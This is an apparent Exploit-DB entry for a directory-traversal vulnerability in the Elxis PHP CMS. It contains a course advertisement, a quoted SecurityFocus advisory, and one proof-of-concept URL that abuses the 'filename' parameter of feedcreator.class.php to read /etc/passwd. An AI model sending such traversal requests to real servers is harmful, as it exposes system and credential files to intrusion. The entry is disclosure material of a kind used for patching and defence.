Elxis - 'Filename' Directory Traversal

EDB-ID:

33383


Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2009-11-30


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

source: https://www.securityfocus.com/bid/37158/info

Elxis is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. 

http://www.example.com/includes/feedcreator.class.php?filename=../../../../../../etc/passwd